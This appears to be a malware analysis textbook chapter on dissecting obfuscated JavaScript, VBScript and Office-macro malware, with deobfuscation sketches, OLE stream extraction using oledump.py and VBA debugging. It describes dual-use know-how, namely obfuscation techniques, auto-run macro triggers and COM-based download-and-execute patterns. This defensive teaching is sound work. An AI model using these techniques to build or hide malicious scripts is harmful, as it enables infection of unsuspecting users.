So far in the book, we have analyzed malware in the form of binary executables. But malware can also be delivered in other file formats, and this has become a common delivery technique. Attackers even take it one step further by delivering and executing the contents of nonexecutable malware entirely in memory, without ever writing it to disk as a file. This is known as fileless malware.
Nonexecutable malware usually takes the form of scripts. JavaScript, VBScript, and PowerShell are some of the common scripting languages used to create malicious scripts. These scripts can also be embedded in other files like HTML pages, Microsoft Word documents, Excel sheets, PDF documents, and so forth. Both standalone scripts and documents with embedded malicious scripts are commonly used formats for creating malware. Such malware is often delivered as an attachment in phishing emails to victims who do not suspect the attachment to be malicious simply because it is not an executable.
In this chapter, we look at script-based malware that is commonly used these days. We also go into the details of dissecting malware based on Microsoft Word and other Office documents, exploring various static and dynamic techniques to analyze and debug them.
Windows Scripting Environment
Almost all operating systems natively support scripting languages. Malware authors use these very same languages to write malicious scripts that deploy their malware.
Some scripting languages allow the script programs/files to be compiled into an intermediate binary representation that can then be executed by their VMs (different from hypervisor virtual machines). In other cases, scripts can even be compiled into binary executables. But the most common way to use and distribute scripts is in their raw, human-readable source form, which is what we concern ourselves with in this chapter.
Whatever language you write your script in, it requires an interpreter that can understand the contents of the script and execute it. By default, Windows has a scripting environment called Windows Script Host (WSH), which has interpreters that support the execution of JavaScript files with the .js extension and VBScript files with the .vbs extension, among others. Later versions of Windows introduced a new scripting language called PowerShell, which was meant to automate administrative tasks in an enterprise environment.
Most script-based malware that targets Windows is written in VBScript, JavaScript, or PowerShell.
These scripts need not always be standalone script programs. They can also be embedded in other files like HTML pages, Office documents, and PDF files. The embedded scripts run when the outer file that contains them is opened. For example, consider an HTML file that contains a script written in JavaScript. This JavaScript runs when the HTML file is loaded by browsers like Firefox, Chrome, and Internet Explorer. The JavaScript inside the HTML file is executed by the JavaScript interpreter embedded in these browsers. For example, Firefox uses the open source SpiderMonkey JavaScript engine/interpreter to run the JavaScript present in HTML files.
Similarly, Office documents like Word and Excel files require Microsoft Office to be installed on the system to open them. These files can have VBA (Visual Basic for Applications) scripts embedded in them, which are also called macros. Microsoft Office has a VBA interpreter embedded in it to execute the VBA scripts in these Word and Excel files when they are opened.
As mentioned earlier, scripts are passed around in human-readable source code format, so the contained code is visible in plain sight for analysis, unlike compiled programs. To counter this, malware authors use obfuscation techniques to make the code unreadable and hide its actual content and intention. In the next section, let’s explore some of the obfuscation techniques commonly used by malware.
Obfuscation
Obfuscation is a process meant to hide both the actual content and intent of the program in the script files. These days there are a lot of readily available obfuscators that can turn plain script code into an unreadable/obfuscated form. Most obfuscators work by treating the entire source code or parts of the code as strings that can be stored across multiple variables in the final generated obfuscated file. The obfuscators break up the script code, add some other code along with it, and encode parts of it to make it unreadable, while making sure the logic remains intact at the time of execution. This means the output of the code is not altered by the obfuscation even though the look and feel of the code have changed entirely.
Before we explore some of the simple obfuscation techniques used by malware authors, let’s look at Malzilla, which we use to analyze JavaScript code. Malzilla is a popular malware analysis tool specifically built to deobfuscate JavaScript malware, and it uses the SpiderMonkey JavaScript engine to execute JavaScript code.
Hello World Plain JavaScript
In the next set of sections, we take the same simple one-liner piece of code from Listing 20-1 and obfuscate it into multiple forms using various techniques. We urge you to execute the obfuscated versions of the code in Malzilla and compare the output with the original code, which should be the same as the output from Figure 20-1.
Hex Equivalents
Obfuscation Using Hex Equivalent for the Code in Listing 20-1
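As a minimal sketch of the idea, and not the listing referenced above, every character of a string literal can be written as a \xNN escape holding its hexadecimal character code. The helper name toHexEscapes is hypothetical, the sketch assumes ASCII input, and console.log stands in for document.write so that it also runs outside a browser.

```javascript
// Hypothetical helper: rewrite each character as a \xNN escape.
// Assumes ASCII input, since \xNN can only express codes below 0x100.
function toHexEscapes(text) {
  return Array.from(text)
    .map((ch) => "\\x" + ch.charCodeAt(0).toString(16).padStart(2, "0"))
    .join("");
}

const plain = "Hello World!";

// The text an obfuscator could place between the quotes of a string literal.
const escapedSource = toHexEscapes(plain);

// The engine resolves \xNN escapes while parsing the literal, so the
// obfuscated literal is the very same string at run time.
const obfuscated = "\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21";

console.log(escapedSource);
console.log(obfuscated === plain);
```

Because the escapes are resolved by the parser, simply printing such a literal in any JavaScript engine is enough to recover the readable text.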
Splits and Joins
Equivalent Obfuscated Code for One from Listing 20-1 That Uses Split Strings
The obfuscator has split the string Hello World! into three strings and stored them in the str1, str2, and str3 variables. If you observe the last line of code, the parameter of document.write combines these three variables using the + operator, thereby reconstructing the original string Hello World!
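The split-and-concatenate pattern can be sketched as follows. The variable names str1, str2, and str3 come from the text, but the split points are illustrative, and console.log is used in place of document.write so the sketch runs outside a browser.

```javascript
// Illustrative split points; an obfuscator may cut the string anywhere.
var str1 = "Hel";
var str2 = "lo Wo";
var str3 = "rld!";

// Concatenating with + rebuilds the original string at run time.
var rebuilt = str1 + str2 + str3;
console.log(rebuilt); // prints "Hello World!"
```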
Inserting Junk
Obfuscators often insert both junk code and junk data among the real script code and data. When the obfuscated code executes, the inserted junk code works like a NOP instruction: running it changes neither the state nor the output of the program. In contrast, the junk data interspersed among the real script data is cleaned/removed to extract the real data before it is used.
Equivalent Obfuscated Code for One from Listing 20-1 That Uses Junk Code/Data
If you look at the code, the junk string xyA has been inserted at random places inside the Hello World! string to generate the final junk-laden string HexyAlloxyAxyA WxyAorxyAldxyA!xyA, which is held in the variable str. The code, when executed, cleans up the junk from str using the replace() function and stores the reconstructed original string in the new variable rep1, which is then passed as a parameter to the document.write function.
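A minimal sketch of this cleanup, using the str and rep1 names and the junk-laden string from the text. The junk code lines and the use of a global regular expression with replace() are assumptions made for illustration, and console.log stands in for document.write.

```javascript
// Junk data: "xyA" has been scattered through the real string.
var str = "HexyAlloxyAxyA WxyAorxyAldxyA!xyA";

// Junk code (illustrative): computes a value that nothing ever uses,
// so deleting these two lines would not change the script's output.
var pad = 7 * 3;
pad = pad - pad;

// Remove every occurrence of the junk marker to recover the real data.
var rep1 = str.replace(/xyA/g, "");
console.log(rep1); // prints "Hello World!"
```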
Equivalent Obfuscated Code for One from Listing 20-1 That Uses Junk Code/Data in Combination with split() and join() APIs
This code also uses the same string with junk inserted as in the previous example, but here the junk string is split into substrings by using xyA as a delimiter. The substrings generated are then joined/concatenated together using the join() function to generate the original string.
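The same cleanup expressed with split() and join() might look like the sketch below. The variable names pieces and joined are hypothetical, and console.log again stands in for document.write.

```javascript
var str = "HexyAlloxyAxyA WxyAorxyAldxyA!xyA";

// Splitting on the junk marker discards it and leaves only the real fragments.
var pieces = str.split("xyA");

// Joining the fragments with an empty separator restores the original string.
var joined = pieces.join("");
console.log(joined); // prints "Hello World!"
```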
Expression Evaluation with eval
Evaluation functions like eval are also commonly used in obfuscated scripts. They are mostly used to evaluate expressions, which in effect means that eval can execute a piece of code that is passed to it as a string parameter.
So far, we only saw the use of variables containing string data that was tampered with or obfuscated. With eval, we can take it further: even the document.write function call can be stringified and supplied as a string to the eval function, which then executes it. This lets us obfuscate the full script, including its function calls, using the techniques we discussed in the previous sections.
Equivalent Obfuscated Code for One from Listing 20-1 That Uses eval() Function
In the listing, you see that even the document.write() function call from Listing 20-1 is stringified and split into multiple strings, and then reassembled into its original form when it is passed as a parameter to eval, which then executes it.
While deobfuscating and analyzing malware scripts, eval() functions are a good point to investigate. The parameter passed into an eval function is likely to contain the final deobfuscated code.
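One way to inspect what reaches eval, sketched here under stated assumptions, is to run the script with eval replaced by a logging stub. The function name captureEvalArguments and the sample script are hypothetical, and this is not how Malzilla is implemented. The stub only records its argument and does not execute it, but the rest of the script still runs, so this belongs on an isolated analysis machine.

```javascript
// Hypothetical helper: run a script with `eval` bound to a stub that
// records its argument instead of executing it.
function captureEvalArguments(scriptSource) {
  const captured = [];
  const loggingEval = (code) => {
    captured.push(String(code));
  };
  // The script body becomes a function whose parameter is named `eval`,
  // so every eval(...) call inside it reaches the stub.
  new Function("eval", scriptSource)(loggingEval);
  return captured;
}

// Illustrative obfuscated script: the call is stringified and split up.
const sampleScript = [
  'var a = "docu" + "ment.wr";',
  'var b = "ite(\\"Hello";',
  'var c = " World!\\");";',
  "eval(a + b + c);",
].join("\n");

const seen = captureEvalArguments(sampleScript);
console.log(seen[0]); // prints document.write("Hello World!");
```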
If you double-click the eval results in the eval window, you can see in the output window the expression or the parameter passed to the eval function. In this case, it is our original de-obfuscated JavaScript code document.write("Hello World!");.
Encryption Algorithms
Obfuscators may use encryption or encoding algorithms to turn the code into a nonreadable format. One of the most common encoding schemes used for obfuscation is base64. For example, ZG9jdW1lbnQud3JpdGUoIkhlbGxvIFdvcmxkISIpOw== is the base64-encoded form of document.write("Hello World!");. Base64-encoded strings consist only of characters from the set A-Z, a-z, 0-9, +, and /, and end with one or two = characters when padding is needed, which makes them easy to identify. If you encounter such a string, you can use a base64 decoder to decode it.
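A rough sketch of spotting and decoding such a string, assuming a Node.js environment where Buffer is available. The helper names looksLikeBase64 and decodeBase64 are hypothetical, and the pattern check is only a heuristic: ordinary words can match it too.

```javascript
// Heuristic check: only base64 alphabet characters, optional = padding,
// and a length that is a multiple of four.
function looksLikeBase64(text) {
  return (
    text.length > 0 &&
    text.length % 4 === 0 &&
    /^[A-Za-z0-9+\/]+={0,2}$/.test(text)
  );
}

// Decode with Node's Buffer (an assumption; browsers offer atob instead).
function decodeBase64(text) {
  return Buffer.from(text, "base64").toString("utf8");
}

const encoded = "ZG9jdW1lbnQud3JpdGUoIkhlbGxvIFdvcmxkISIpOw==";
if (looksLikeBase64(encoded)) {
  console.log(decodeBase64(encoded)); // prints document.write("Hello World!");
}
```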
There can be numerous obfuscation techniques used by obfuscators, of which we have covered some of the commonly used ones. In our next section, let’s explore some ways to deobfuscate these obfuscated scripts.
Deobfuscation
Before deobfuscating a piece of code, we need to understand some basics of the scripting language in which it is written. It’s not necessary to understand all of it. You should understand how variables are declared, how they are assigned values, and so forth. In JavaScript, the var construct declares a variable, while in VBScript, the Dim construct does the same. Other constructs like for, while, if, and else are common keywords in almost all programming languages.
Commonly Used JavaScript Keywords and Functions
Function | Description |
---|---|
eval | Evaluates an expression |
replace | Replaces the occurrence of a substring in a string |
split | Splits strings using delimiter |
join | Joins array elements into a single string, using a delimiter |
fromCharCode | Converts Unicode code values to characters |
+ operator | String concatenation |
concat | String concatenation |
document.write | Writes to HTML document |
console.log | Writes to the browser console |
When you are dealing with obfuscated scripts in other languages, you need to find the relevant keywords and functions in that language as well.
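As a small illustration of a few of these functions, the sketch below builds the same string three different ways. The variable names are hypothetical and the character codes are simply those of Hello World!.

```javascript
// fromCharCode: character codes turned back into text.
var codes = [72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100, 33];
var fromCodes = String.fromCharCode.apply(null, codes);

// concat: string concatenation through a method call.
var viaConcat = "Hello".concat(" ", "World!");

// join: array elements glued together with a delimiter.
var viaJoin = ["Hello", "World!"].join(" ");

console.log(fromCodes); // prints "Hello World!"
console.log(viaConcat === fromCodes && viaJoin === fromCodes); // prints true
```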
In the next set of sections, let’s explore some of the deobfuscation techniques that we can use.
Static Deobfuscation
Static deobfuscation means manually assessing the code without executing it, either by directly reading the code and understanding its constructs or with the aid of static deobfuscation tools that format the code better and make the process easier. Again, the basics of the programming language are required to understand the code.
This kind of process may be time consuming. Also, most malware’s obfuscated script code does not look as simple as the one in Listing 20-5. Actual malware obfuscated code is usually long and complex, and in a lot of cases, one single line can contain the entire script code.
Do you think you can manually analyze this code by reading it? Maybe parts of it, but not the whole script. Not unless you are Neo from The Matrix.
As seen, Malzilla analyzes the code and formats it into a more readable multiple-line format from the single line it previously used. But static analysis and manual reading of the script code can only take us so far when it comes to figuring out the malware’s intent. It’s better to investigate this kind of code by debugging or executing it, as you see in the next section.
Dynamic Deobfuscation
The code passed to eval is still slightly obfuscated, but it is readable enough to draw a conclusion from it. It has some suspicious domain names in it. If you Google these domain names, you find that they are related to malicious sites, allowing you to conclude that the sample script is malicious.
HTML Code with JavaScript Code from Sample-20-2.html in Our Samples Repo
If you open Sample-20-2.html in a text editor, extract the JavaScript code contained between the <script> and </script> tags as seen in the listing, and try running it in Malzilla, it fails and shows a compilation error. Why does this happen?
This is because browsers support the getElementById function used in the JavaScript code, and Malzilla does not. In the code, the obfuscated string is stored in an element of the HTML page that has the ID obfus. The JavaScript fetches the obfuscated code by using getElementById and then deobfuscates the contents. The obfus element forms a part of the Document Object Model (DOM) structure of the HTML page, which can be accessed only if the JavaScript code is executed from inside a browser. But since Malzilla is a standalone JavaScript engine, it cannot access the element by any means, and thus throws an error.
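To illustrate the dependency on the DOM, the sketch below fakes just enough of a document object for such a script to run in a standalone engine like Node.js. The helper makeDocumentStub, the element content, and the deobfuscation step are all hypothetical placeholders rather than the contents of Sample-20-2.html, and nothing here implies that Malzilla can be extended this way.

```javascript
// Hypothetical stand-in for the page: element IDs mapped to their text.
function makeDocumentStub(elements) {
  const written = [];
  return {
    written,
    // Mimics the browser call: returns an element-like object or null.
    getElementById(id) {
      return Object.prototype.hasOwnProperty.call(elements, id)
        ? { innerHTML: elements[id] }
        : null;
    },
    // Collects output instead of rendering it into a page.
    write(text) {
      written.push(String(text));
    },
  };
}

// Placeholder content for the element with the ID "obfus".
const document = makeDocumentStub({
  obfus: "HexyAlloxyAxyA WxyAorxyAldxyA!xyA",
});

// The script under analysis can now fetch and deobfuscate its data.
const hidden = document.getElementById("obfus").innerHTML;
document.write(hidden.split("xyA").join(""));
console.log(document.written[0]); // prints "Hello World!"
```

In practice, debugging the page inside a real browser avoids having to guess which parts of the DOM the script needs.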
JavaScript malware need not always be shipped by an attacker as a standalone script. Malicious JavaScript can be embedded in documents like HTML and PDF. Some HTML files contain JavaScript code that runs only in one particular type of browser. Similarly, JavaScript embedded in PDF files is executed by PDF readers like Foxit and Adobe Reader and may be targeted to run only in one specific reader. Malicious JavaScript may also contain exploit code, which is software specific and even version specific, meant to exploit a vulnerability in the targeted PDF reader software.
Embedded Script Debuggers
JavaScript Debugger Keyboard Shortcuts for Internet Explorer
Debugger functionality | Keyboard shortcut |
---|---|
Step into | F11 |
Step over | F10 |
Set Breakpoint | F9 |
Execute | F5 |
Before starting the debugger, you need to set a breakpoint. You can set a breakpoint by going to the specific line in the JavaScript code and pressing the F9 keyboard shortcut, as seen in Figure 20-8.
The Watch window displays the list of variables on which a watch has been set. If the code is highly obfuscated, you can keep an eye on the variables in the Watch window. The data stored in these variables changes as we step through the code in the debugger, and at some point, they may contain deobfuscated code.
Debugging is one of the best methods to deobfuscate and analyze script-based malware. JavaScript embedded in HTML pages can be debugged using the JavaScript debugger in the browsers. Similarly, VBA scripts embedded in Word documents can be debugged using the Visual Basic debugger present in Microsoft Office, as you will see in the next section, and PowerShell scripts can be debugged in PowerShell ISE.
All script debuggers, whether it is a JavaScript debugger in Chrome or Firefox or the Visual Basic debugger in Microsoft Word, offer code stepping, breakpoints, watches, and so forth. The debugging techniques we applied to deobfuscate JavaScript can also be used to deobfuscate other script-based malware.
The Payload
Most of the time, script-based malware is used as a downloader, which downloads other malware/payloads like ransomware, banking trojans, and so forth and then executes them on the victim machine. These malicious scripts can also be present in compound documents like PDF and Word documents. Such documents can also contain malicious executables embedded inside them along with the malicious scripts. In that case, the embedded scripts are responsible for extracting this malware, dropping it to the file system, and executing it. This kind of malware falls into the category of droppers. Another kind of payload in script-based malware is an exploit that takes advantage of some vulnerability in the software that loads the script.
Downloaders and Droppers
For downloading and dropping capability, the scripts can take the help of Windows Component Object Model (COM) objects. To simplify COM, you can think of these as classes that have member variables and functions. We can create objects from these classes and call their methods/functions to use the functionality they provide.
There can be multiple COM objects for various functionalities, including ones that allow you to access the Internet using an HTTP protocol, interact with the file system, the registry, and so forth. Since we are mostly dealing with downloaders and droppers in this chapter, we look at those COM objects that can help to achieve the mentioned functionalities.
Methods Implemented in MSXML2.ServerXMLHTTP and Their Functionality
Methods | Functionality |
---|---|
open | define HTTP request |
send | send HTTP request |
ResponseBody | property that contains the HTTP response body |
Methods Implemented in ADODB.Stream and Their Functionality
Methods | Functionality |
---|---|
Open | Opens a stream |
Write | Writes data to the stream |
SaveToFile | Saves stream to a file |
Close | Closes the stream |
Methods Implemented in WScript.Shell and Their Functionality
Methods | Functionality |
---|---|
Run | Executes OS command as a new process |
Exec | Executes OS command but as a child process |
RegWrite | Writes a key or value to the registry |
RegRead | Reads a key or value from the registry |
RegDelete | Deletes a key or value from the registry |
The script-based malware written in Visual Basic and JavaScript uses these COM objects to achieve their various functionalities, including downloading additional malware payloads, writing them to files on the disk, and then executing them. While analyzing malicious scripts in the final deobfuscated code, you are likely to see these COM objects plus other similar ones being instantiated and their methods being invoked to achieve various tasks.
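As a rough triage aid, deobfuscated script text can be searched for these COM object names. The sketch below is a simple case-insensitive string search; the function name findComObjects, the capability labels, and the sample text are hypothetical, and a real script may build these names at run time, in which case a static search like this finds nothing.

```javascript
// COM object names from the tables above, with a short capability label.
const COM_INDICATORS = {
  "MSXML2.ServerXMLHTTP": "HTTP requests (download)",
  "ADODB.Stream": "writing data to a file",
  "WScript.Shell": "command execution and registry access",
};

// Return the known COM object names that appear in the script text.
function findComObjects(scriptText) {
  const lowered = scriptText.toLowerCase();
  return Object.keys(COM_INDICATORS).filter((name) =>
    lowered.includes(name.toLowerCase())
  );
}

// Illustrative deobfuscated text; the variable names are made up.
const deobfuscated = [
  'Set http = CreateObject("MSXML2.ServerXMLHTTP")',
  'Set shell = CreateObject("wscript.shell")',
].join("\n");

for (const name of findComObjects(deobfuscated)) {
  console.log(name + ": " + COM_INDICATORS[name]);
}
```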
Exploits
Various malware that comes in the form of Microsoft Office documents, or PDF files or HTML files might contain exploits targeted for browsers, Microsoft Office document readers or PDF readers. Exploits are pieces of code that take advantage of a vulnerability in the software. A vulnerability is a kind of bug that can compromise software and then the system on which the software is running. Vulnerabilities are exploited/triggered by providing a specially crafted input to the target software. For example, HTML documents can serve as input to browsers like Chrome and Firefox and so forth, while a Word document can serve as an input for Microsoft Office apps.
Exploits and vulnerabilities are a vast subject in themselves and are beyond the coverage of this book. If you want to find out what an exploit looks like, you can browse through exploit-db.com.
VBScript Malware
The Windows scripting environment supports Visual Basic Scripting (VBScript) by default, which is exploited by attackers who send malicious script files with the .vbs extension in phishing emails. Visual Basic for Applications (VBA) is a derivative of Visual Basic with similar syntax, used to write scripting code that is embedded into Microsoft Office documents. Attackers can embed malicious scripts written in VBA into these documents to create malicious Microsoft Office files.
Some of the Basic Keywords Available in Visual Basic Language
Keywords | Description |
---|---|
Dim | Declares a variable |
As | Sets data type during variable declaration |
Set | Assigns object to a variable |
If | If condition start |
Then | Code after this executed if the condition is satisfied |
Else | else condition |
End If | End of If block |
Sub <subroutine name> | Start of subroutine |
End Sub | End of subroutine |
Function <Function Name> | Start of a function |
End Function | End of Function |
While browsing through Visual Basic programs, you encounter two kinds of procedures, called subroutines and functions. Both are quite similar, but the basic difference is that subroutines do not return anything while functions do. A subroutine starts with the Sub keyword and ends with End Sub, while a function starts with the Function keyword and ends with End Function.
Sample Visual Basic Code That Downloads and Executes Malware
The code uses the COM objects MSXML2.ServerXMLHTTP, ADODB.Stream, and WScript.Shell, which we spoke about earlier, to access the malicious URL, download the malware hosted on it, and execute it. You encounter very similar code in VBScript and VBA malware. But the code is rarely in the plain format seen in the listing and is most often obfuscated. We need to deobfuscate it to dissect the actual code and figure out its intention. We explain VBA deobfuscation in malicious Microsoft Office documents in the next section.
Microsoft Office Malware
Office documents like Word, PowerPoint, and Excel files have been constantly used by attackers to carry out phishing attacks via email. In a lot of phishing attacks, these malicious documents contain hyperlinks that redirect to malicious websites when the victim clicks on them. Attackers frequently use these kinds of documents to deliver malware because users tend to assume that a file that is not an executable cannot be malicious. Combined with the fact that most users store their data in these kinds of documents, this makes them an attractive option for attackers.
In this section, we look at more stealthy and more complex forms of attack using documents where malicious executables and scripts are deeply embedded into the file format of these Microsoft Office documents.
When dealing with Microsoft Office malware, you usually see three file extensions for Word documents: .doc, .docx, and .rtf. Similarly, for PowerPoint files, you see .ppt and .pptx, and for Excel files, you see .xls and .xlsx. All Microsoft Office versions support the .doc, .ppt, and .xls formats, while .docx, .pptx, and .xlsx are supported from Microsoft Office 2007 onward. To understand attacks based on these Office documents, we need to look at the OLE file format, which is the file format used by the binary .doc, .ppt, and .xls documents. The newer formats are ZIP-based containers that store any macro project as an embedded OLE file.
OLE File Format
Object Linking and Embedding (OLE) is a file format developed by Microsoft that allows other kinds of files like executables, media files, hyperlinks, and scripts to be embedded into documents. Microsoft Office documents follow the OLE file format.
OLE is a compound file format that can accommodate other files in it, just like a file system. OLE file formats can accommodate media files, text files, macros (scripts), embedded executables, and so forth.
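Before parsing a document, it can help to confirm which container it really uses, since the file extension can be misleading. The sketch below checks the leading signature bytes: OLE compound files begin with D0 CF 11 E0 A1 B1 1A E1, ZIP-based Office files begin with PK followed by the bytes 03 04, and RTF files begin with {\rtf. The function name identifyContainer and the return labels are hypothetical, and Node.js Buffer is assumed.

```javascript
// Well-known leading signatures of the three container types.
const OLE_MAGIC = Buffer.from([0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 0x1a, 0xe1]);
const ZIP_MAGIC = Buffer.from([0x50, 0x4b, 0x03, 0x04]);
const RTF_MAGIC = Buffer.from("{\\rtf", "latin1");

// True when `data` begins with the bytes in `magic`.
function startsWith(data, magic) {
  return (
    data.length >= magic.length &&
    data.subarray(0, magic.length).equals(magic)
  );
}

// Classify a file's contents by its first bytes.
function identifyContainer(data) {
  if (startsWith(data, OLE_MAGIC)) return "ole";
  if (startsWith(data, ZIP_MAGIC)) return "zip";
  if (startsWith(data, RTF_MAGIC)) return "rtf";
  return "unknown";
}

// With a real file: identifyContainer(require("fs").readFileSync(path))
const fakeDoc = Buffer.concat([OLE_MAGIC, Buffer.alloc(16)]);
console.log(identifyContainer(fakeDoc)); // prints "ole"
```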
As malware analysts, we are more concerned about embedded macros and embedded executables, since attackers use them to create malicious documents. Macros are script code meant for automating certain tasks within a document. We look at macros in more detail later.
As we said earlier, the OLE file format is like a file system, where various kinds of objects can be stored in a structured manner. It has storages, which are equivalent to directories on a file system, and streams, which are equivalent to files. Just like directories can have subdirectories and files under them, a storage in an OLE file can have further storages and streams under it. Media files, macro code, and binary executables are stored inside streams. A storage can have a name that gives an idea about its contents.
Macros: Contains macro code
ObjectPool: Contains objects which can include media, embedded executables.
MsoDataStore: Stores the metadata of information about other contents
From the point of view of malware analysis, Macros and ObjectPool are the important ones. The first one is likely to contain malicious macro scripting code while the second one can have embedded malicious executables. In the next section, let’s explore the OLE file format with the help of some tools.
Dissecting the OLE Format
Several tools can parse the OLE file format. Some of them have a nice user interface, while others are command-line only. Two popular tools are oletools and oledump.py, the latter from Didier Stevens.
The stream named Ole10Native contains embedded data in it, which seems to be a PE executable file as identified by the MZ magic bytes.
The output from oledump.py displays the streams in various storage of the .doc file. The tool has numbered the streams from 1 to 17. The storage name ends with / just like we see for a directory in a file system. If you notice in the figure, some of the storage objects are Macros, Macros/VBA, OleObjectPool, MsoDataStore, all of which are followed by a /. The second column displays the kind of stream where M represents a macro while O represents an embedded object. You can match the names of the storages and streams seen from the output with the output we saw from the UI of DocFileViewer. In the next section, we are going to extract and analyze these streams.
Extracting Streams
Streams can be extracted using the DocFileViewer tool. But some of the streams, especially the macro streams, can be compressed. Oledump.py is a better option to extract streams as it has the option to decompress the streams as well.
To dump a stream using oledump.py, you can use the command oledump.py -s Stream_Number -[d|v] <File_Path>. The -s option specifies the number of the stream as displayed by the oledump.py output seen earlier in Figure 20-14. <File_Path> is the path of the Microsoft Office file you want to analyze. The second option specifies how we want the stream to be processed while being dumped. The -d option instructs oledump.py to dump the raw contents of the stream, which is useful when you are dumping a stream containing an embedded executable. If it is a macro stream that you want to extract, you can use the -v option, which dumps the decompressed macro script code.
As we saw in the oledump.py output for Sample-20-3.doc in Figure 20-14, and in the DocFileViewer tool in Figure 20-13, the document contains a stream, Ole10Native, which holds an embedded PE executable. oledump.py has numbered this stream 14. Let’s dump this stream using oledump.py. You can redirect the output, which contains the stream contents, to a file using the redirection operator > at the end of the command. Run the command oledump.py -s 14 -d Sample-20-3.doc > dumpfile, which dumps the contents of stream 14 to a file named dumpfile. You can now further analyze the contents of dumpfile using a hex editor of your choice.
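Besides eyeballing the dump in a hex editor, the embedded executable can be located programmatically. The sketch below searches a buffer for the MZ magic bytes and confirms each candidate by following the 4-byte offset stored at position 0x3C of the DOS header to the PE signature. The function name findEmbeddedPe is hypothetical, Node.js Buffer is assumed, and the demonstration uses synthetic bytes rather than the real dumpfile.

```javascript
// Return the offset of the first MZ header that is followed by a valid
// PE signature, or -1 when none is found.
function findEmbeddedPe(data) {
  let offset = data.indexOf("MZ", 0, "latin1");
  while (offset !== -1) {
    // The DOS header must be long enough to hold the field at 0x3C.
    if (offset + 0x40 > data.length) break;
    const peOffset = offset + data.readUInt32LE(offset + 0x3c);
    const hasSignature =
      peOffset + 4 <= data.length &&
      data.toString("latin1", peOffset, peOffset + 4) === "PE\u0000\u0000";
    if (hasSignature) return offset;
    offset = data.indexOf("MZ", offset + 1, "latin1");
  }
  return -1;
}

// Synthetic example: 10 bytes of leading data, then a skeletal PE image.
// With a real dump: findEmbeddedPe(require("fs").readFileSync("dumpfile"))
const image = Buffer.alloc(0x80);
image.write("MZ", 0, "latin1");
image.writeUInt32LE(0x40, 0x3c); // offset of the PE signature
image.write("PE\u0000\u0000", 0x40, "latin1");
const dump = Buffer.concat([Buffer.alloc(10, 0x41), image]);

console.log(findEmbeddedPe(dump)); // prints 10
```

Everything from the returned offset onward can then be carved out and analyzed like any other executable.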
So, 46 out of 69 anti-malware programs detected the file at the time we uploaded it. This is a strong indication that the file is malicious.
In the next section, let’s look at macro streams and how to extract and analyze them from Office OLE files. But first, let’s try to understand some of the basics of macro programming.
Macros
Macros are scripts that are meant for automating tasks in Microsoft Word, Excel, and PowerPoint files, and are embedded inside the OLE file format in these files. Macros are mostly written in programming languages like VBA. Malicious threat actors embed malicious macros into these Office document files, turning them malicious. When unsuspecting victims open these malicious documents on their system using Microsoft Office Suite of tools like Microsoft Word, Excel, and PowerPoint, the Office tool executes this embedded malicious macro in these Office files, thereby infecting the system.
We already talked about some basics of Visual Basic Scripting. As we mentioned earlier, VBA scripts are similar to VBScript. But since VBA is specially meant to be executed within Office documents, it has certain extra features related to them. One of these special features is automatic subroutines, which are exploited by malware writers to write malicious macros, as we discuss next.
Automatic Macros
Some of the Auto Subroutines Present in the Office VBA Environment That Can Be Used by Macros
Subroutine Name | Triggering Event |
---|---|
AutoExec | When Word is started |
AutoNew | When new document is created |
AutoOpen | When existing document is opened |
AutoClose | When document is closed |
AutoExit | When you exit Word |
Example Macro with AutoOpen Subroutine That Places a HTTP Request on Document Open
Now that you know the basics of VBA macros, let’s learn how to extract and analyze them. We again use the oledump.py tool for this.
Macro Extraction
As an exercise, open the text file Sample-20-4.txt from the samples repo, which contains instructions to download the actual malware Office .doc file, which you can download and then rename as Sample-20-4.doc. Let’s look at the OLE structure of this document file using oledump.py, as we did in the previous section.
As you can see in the screenshot, and in the dumpfile output that contains the same macro code, the macro script code defines a Document_Open() automatic subroutine, which is triggered when the document is opened. If you look at the code of the Document_Open() subroutine, it invokes another function, JTCKC(), several times.
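When triaging extracted macro code, a quick first check is whether it defines any automatically triggered subroutine. The sketch below scans macro source text for the auto subroutine names listed earlier plus Document_Open. The function name findAutoMacros and the sample macro body are hypothetical; the sample is not the code from Sample-20-4.doc.

```javascript
// Auto subroutine names from the table above, plus Document_Open.
const AUTO_NAMES = [
  "AutoExec",
  "AutoNew",
  "AutoOpen",
  "AutoClose",
  "AutoExit",
  "Document_Open",
];

// Return the automatic subroutines defined in the given VBA source.
function findAutoMacros(vbaSource) {
  // VBA identifiers are case-insensitive, so compare in lowercase.
  const known = new Set(AUTO_NAMES.map((name) => name.toLowerCase()));
  // Matches "Sub Name" at the start of a line, with an optional
  // Public/Private modifier; "End Sub" lines do not match.
  const subPattern = /^[ \t]*(?:(?:Public|Private)[ \t]+)?Sub[ \t]+(\w+)/gim;
  const hits = [];
  for (const match of vbaSource.matchAll(subPattern)) {
    if (known.has(match[1].toLowerCase())) hits.push(match[1]);
  }
  return hits;
}

// Illustrative macro text only.
const macroText = [
  "Private Sub Document_Open()",
  "    JTCKC",
  "End Sub",
  "Function JTCKC()",
  "End Function",
].join("\n");

console.log(findAutoMacros(macroText)); // prints [ 'Document_Open' ]
```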
From visually analyzing this macro code, it is hard to make sense of the variable names since they are long and randomized, which is a clear sign of obfuscation. It is still possible to manually read the code and figure out its meaning and intent, but it can be time-consuming. If we debug the code, it is much easier to deobfuscate it and understand its functionality. To dynamically debug this macro, we can use the built-in Visual Basic debugger provided by Microsoft Word, as you see in the next section.
Macro Deobfuscation Using Debugging
The left side of the window is the project window, which can display the files used in the VBA project. The right-hand window is the debugger window, which we use to debug the VBA macros.
VBA Debugger Shortcuts
Debugger Functionality | Keyboard Shortcut |
---|---|
Step Into | F8 |
Step Over | Shift+F8 |
Run to Cursor | Ctrl+F8 |
Set Breakpoint | F9 |
Execute | F5 |
The debugger step functionalities Step Into, Step Over, and Breakpoints are the same as in all the other debuggers.
As you can see, when you start the debugger from the Document_Open() location, you see a yellow arrow cursor on the margin on the left side of the code. This yellow arrow cursor points to the code which is going to be executed next. We can step through the code line by line to see the values in various variables that can hold deobfuscated content. The technique of starting debugger may vary between versions of Microsoft Office, but the overall techniques of debugging remain the same.
If you observe the macro code, two of the variables are used quite frequently: FSGOPS and NAQGP. The variables are assigned values again and again throughout the macro code. Most likely, these variables hold some important value.
